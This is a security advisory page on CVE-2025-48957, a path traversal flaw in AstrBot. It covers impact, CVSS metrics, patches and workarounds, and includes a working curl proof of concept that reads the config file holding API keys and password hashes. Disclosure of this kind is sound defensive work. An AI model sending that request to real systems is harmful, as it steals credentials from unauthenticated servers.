Skip to main content

Boteraser | Website and Server Security Solutions

🛡️ CVE-2025-48957 — astrbot

🟠 CVSS 8.0 — High ⚠️ Exploit Public CWE-23 OSV
8.0
CVSS Score
0 Low4 Medium7 High9 Critical10

Description

AstrBot Has Path Traversal Vulnerability in /api/chat/get_file

Impact

This vulnerability may lead to:

  • Information disclosure, such as API keys for LLM providers, account passwords, and other sensitive data.

Reproduce

Follow these steps to set up a test environment for reproducing the vulnerability:

1. Install dependencies and clone the repository:

```bash

pip install uv

git clone https://github.com/AstrBotDevs/AstrBot && cd AstrBot

uv run main.py

```

2. Alternatively, deploy the program via pip:

```bash

mkdir astrbot && cd astrbot

uvx astrbot init

uvx astrbot run

```

3. In another terminal, run the following command to exploit the vulnerability:

```bash

curl -L http://0.0.0.0:6185/api/chat/get_file?filename=../../../data/cmd_config.json

```

This request will read the cmd_config.json config file, leading to the leakage of sensitive data such as LLM API keys, usernames, and password hashes (MD5).

Patches

The vulnerability has been addressed in [Pull Request #1676](https://github.com/AstrBotDevs/AstrBot/pull/1676) and is included in versions >= v3.5.13. All users are strongly encouraged to upgrade to v3.5.13 or later.

Workarounds

Users can edit the cmd_config.json file to disable the dashboard feature as a temporary workaround. However, it is strongly recommended to upgrade to version v3.5.13 or later as soon as possible to fully resolve this issue.

References

  • [Pull Request #1676](https://github.com/AstrBotDevs/AstrBot/pull/1676)
  • [Issue #1675](https://github.com/AstrBotDevs/AstrBot/issues/1675)

How this vulnerability can be exploited

This issue can be reached over the network, attack complexity is low, an attacker needs no privileges on the target. No user interaction is required. The scope is unchanged, so the impact stays within the vulnerable component. Rated impact: confidentiality high, integrity none, availability none.

CVSS metrics in full

The score comes from this vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

  • Attack vector: Network — reachable from anywhere that can route to the service.
  • Attack complexity: Low — the attack works reliably, with no preparation.
  • Privileges required: None — an unauthenticated stranger can try it.
  • User interaction: None — nobody has to be tricked into anything.
  • Scope: Unchanged — the damage stays inside the vulnerable component.
  • Confidentiality impact: High — total loss, or loss the attacker controls.
  • Integrity impact: None.
  • Availability impact: None.

Weakness class

CVE-2025-48957 is classified as CWE-23: Relative Path Traversal. Relative path sequences in user input are not neutralised, so requests can climb out of the intended directory.

Affected software

CVE-2025-48957 is recorded against 1 package.

  • astrbot (from 3.4.4 up to 3.5.13)

Timeline and source

Published on 4 June 2025 and last revised on 7 July 2026. A public exploit is known to exist, which raises the urgency of patching considerably. A vendor advisory or fix has been published. Record sourced from OSV.

References

github.com (Web)
nvd.nist.gov (Advisory)
github.com (Web)
github.com (Web)
github.com (Web)
github.com (Package)
www.vicarius.io (Web)
www.vicarius.io (Web)

Other advisories for this package

astrbot has other advisories on record. If you are patching this one, these are worth checking on the same host:

Same weakness in other software

These advisories are the same class of weakness (CWE-23: Relative Path Traversal) in other software:

Details

Severity HIGH
CVSS Score 8.0
CVSS Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CWE CWE-23
Public Exploit ⚠️ Yes
Source OSV
Published 2025-06-04
Updated 2026-08-20
Modified 2026-07-07

Affected Packages

Software From version Fixed in
astrbot 3.4.4 3.5.13

Similar Threats

Exploit Protection

Are you running astrbot?

CVE-2025-48957 carries CVSS 8.0 High rating and a public exploit already exists. BotEraser checks your installation against this and other known CVE records, and blocks IPs associated with exploit activity.

Check My Site For CVE-2025-48957 →

No credit card required  ·  Results in minutes

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the vulnerabilities listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.

Browse related advisories

All advisoriesCVECVE 2025